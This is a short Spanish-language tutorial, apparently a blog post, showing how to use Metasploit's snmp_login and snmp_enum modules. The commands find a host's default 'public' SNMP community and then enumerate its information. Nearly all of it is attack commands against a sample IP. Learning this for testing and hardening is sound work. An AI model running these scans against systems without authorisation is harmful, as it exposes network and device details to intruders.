Anteriormente hablamos sobre las buenas prácticas de configuración de SNMP sin importar la plataforma que administremos…
Hoy vamos a ver de qué manera obtener información de un equipo vulnerable, a través de una consulta snmp.
Primero actualizamos msfconsole (por las dudas):
msfupdate
Después levantá msfconsole:
msfconsole
Cargamos snmp_login para verificar si utiliza un comunidad por defecto (en nuestro caso utiliza “public”)
use auxiliary/scanner/snmp/snmp_login
set rhosts 172.11.21.100
exploit
Ahora ya sabemos que la comunidad es public (solo lectura), por lo tanto para obtener toda la información posible:
Cargamos snmp_enum
use auxiliary/scanner/snmp/snmp_enum
Seteamos la IP del equipo vulnerable
set rhosts IP
Indicamos la comunidad:
set community public
Iniciamos:
exploit
Listo! Tenes mucha información disponible…
Comments